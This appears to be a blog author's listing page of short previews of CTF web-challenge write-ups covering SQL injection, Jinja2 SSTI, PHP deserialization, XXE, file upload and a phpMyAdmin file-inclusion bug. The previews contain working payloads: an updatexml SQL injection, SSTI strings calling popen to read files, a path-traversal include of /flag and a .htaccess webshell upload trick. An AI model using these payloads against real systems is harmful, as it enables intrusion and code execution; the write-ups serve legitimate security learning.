- 博客(18)
- 收藏
- 关注
原创 [RCTF2015]EasySQL
[RCTF2015]EasySQL1、打开页面一看,有注册,有登录。先注册个号登录一下。2、登录之后,点自己的用户名,发现可以修改密码。盲猜二次注入。3、试了一下amind"#,密码改是改了,但没有什么有用的信息。4、fuzz一下,发现过滤了这些东西5、可以尝试报错注入username=admin" || (updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(
2022-03-23 14:30:01
4123
原创 [CISCN2019 总决赛 Day2 Web1]Easyweb
[CISCN2019 总决赛 Day2 Web1]Easyweb1、打开页面,试了试,xml,sql注入都没试出来。查看robots.txt文件,发现再查看源码,发现了image.php,试一下image.php.bak泄露<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);
2022-03-23 14:27:30
4779
原创 ctfshow--SSTI
ctfshow–SSTI361、{{7*‘7’}}回显是7777777,判断是jinjia2模板。{{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}}''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。362、在__builtin__中有众多的可用函数,包括eval1:?name={{ur
2022-03-15 14:27:55
649
原创 ctfshow--反序列化
ctfshow反序列化篇(255-271)255、class ctfShowUser{ public $isvip=true;}$a=new ctfShowUser();echo urlencode(serialize($a));get传两个参数username=xxxxxx&password=xxxxxxburp抓包,cookie传参user(分号在cookie中不会被正确的上传到服务器,所以需要url编码):256、<?phpClass ctfShowUse
2022-03-15 14:26:57
3208
原创 ctfshow--xxe
ctfshow–xxe有回显<?phperror_reporting(0);libxml_disable_entity_loader(false);//file_get_contents("php://input"),我么需要post我们的payload$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档;作为文档树的根 $dom =
2022-03-15 14:23:28
2664
原创 [GYCTF2020]FlaskApp
[GYCTF2020]FlaskApp看到题目,发现是Flask,猜测是SSTI模板注入,先尝试一下:现在加密栏输入{{7+7}},复制base64编码,然后在解密栏输入,得到:尝试构造payload:{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}发现有waf:在解密栏随便输入一些内容,发现抱错会出现一些信息尝试构造payload,打开app.py{{
2022-03-15 14:21:22
392
原创 [SUCTF 2019]Pythonginx
[SUCTF 2019]Pythonginx@app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(u
2022-03-15 14:19:52
5520
原创 [MRCTF2020]Ezpop
[MRCTF2020]Ezpopappend<-__incoke<-get<-__toString__wakeup() //执行unserialize()时,先会调用这个函数__sleep() //执行serialize()时,先会调用这个函数__destruct() //对象被销毁时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //用于从不可访问的属性读取数据或者不存在
2022-03-15 14:15:47
125
原创 [WesternCTF2018]shrine
[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s):
2022-03-15 14:08:47
1039
1
原创 [De1CTF 2019]SSRF Me
python格式美化一下from flaskimport Flask from flaskimport requestimport socketimport hashlibimport urllibimport sysimport osimport json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os.urandom(16) class Task:
2022-03-15 14:06:54
162
原创 [0CTF 2016]piapiapia
[0CTF 2016]piapiapia代码审计经验不足,以下是我做题的流程:1、进入页面发现登录框,没有注册。先尝试了一下sql注入,发现行不通。之前做过源码泄露的题,试了一下www.zip,就出源码了。2、开始代码审计在profile.php文件里发现了unserialize()和file_get_contents()两个函数,一个是反序列化的标识,一个是查看文件内容的危险函数,而如果我们把$profile[photo]改为config.php,就可以查看flag。[外链图片转存失败,源站
2022-03-15 14:02:44
1602
原创 [GWCTF 2019]我有一个数据库(每日一题)
[GWCTF 2019]我有一个数据库(每日一题)1,打开页面,什么也没有发现,扫个目录看看,发现phpmyadmin2,访问phpmyadmin,版本是4.8.1,这个版本有个任意文件包含的漏洞。漏洞复现地址:https://www.cnblogs.com/leixiao-/p/10265150.html3,payload:?target=db_sql.php%253f/../../../../../../flagps:今天水了一篇(bushi...
2021-09-10 21:16:41
161
原创 [BJDCTF2020]The mystery of ip (每日一题)
[BJDCTF2020]The mystery of ip (每日一题)1,打开网页,看到了flag的标识,点进去发现:2,想起伪造ip,尝试抓包,伪造ip,发现没什么变化3,尝试改成本地ip,发现ip值变化,也许可以在这里做文章4,将ip改为{7*8},被当成语句执行了5,尝试用系统命令{system(“ls”)},发现可以执行,构造{system(“cat /flag”)},得到flag...
2021-09-09 11:53:25
327
原创 [强网杯 2019]高明的黑客(每日一题)
[强网杯 2019]高明的黑客(每日一题)1,打开网页,发现提示,下载文件2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)]3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
2021-09-07 21:01:46
1211
原创 [GXYCTF2019]禁止套娃(每日一题)
[GXYCTF2019]禁止套娃知识点.git源码泄露无参数RCE,参考文章:https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#解题思路1.打开题目,啥也没有,F12也啥都没有,用wscan扫一下目录看看,发现.git返回403,猜测是git源码泄露。2.使用GitHack下载源码[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xecnj2F2-1630909930492)(https://
2021-09-06 14:33:18
668
1
转载 [RoarCTF 2019]Easy Java
[RoarCTF 2019]Easy Java前言昨天发布了我的第一篇博客,里面的内容有很多都是根据其他师傅的博客来写的。发布的时候,需要选择原创还是转载,我感觉自己也参与了一小部分,就填成了原创。所以决定,以后要是遇到一篇文章能把我讲懂的,我就选转载(比如这篇);如果我翻阅了好几篇wp才看懂,然后缝合的,就原创(心虚)。转载文章:https://www.cnblogs.com/karsa/p/13130130.html前置知识WEB-INF/web.xml泄露WEB-INF/web.xml
2021-09-05 13:01:39
218
原创 [GXYCTF2019]BabyUpload
[GXYCTF2019]BabyUpload1,先上传个php文件试试,提示后缀名不能有ph2,上传个.htaccess文件试试,提示上传类型也太露骨了吧.hatccess文件内容:SetHandler application/x-httpd-php3,换个文件类型,换成image/jpeg,上传成功!接下来只需要上传一个带有一句话木马的png/jpg文件就行。(。。还有)对文件内容进行了过滤,猜测过滤了<?6,可以使用<script language="php"&g
2021-09-04 14:21:36
221
原创 [BUUCTF 2018]Online Tool
[BUUCTF 2018]Online Tool前言我到底什么时候才能学会看知识点写题,而不是看题解写题。(三重套娃)今天做题日常看wp,看到了两位师傅写的本道题的题解,经过反复观看才勉强看懂,下面是两位师傅的链接:(基本全程抄(bushi)) https://blog.youkuaiyun.com/weixin_44077544/article/details/102835099 https://blog.youkuaiyun.com/TM_1024/article/details/107393796?utm_me
2021-09-04 14:07:05
160
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人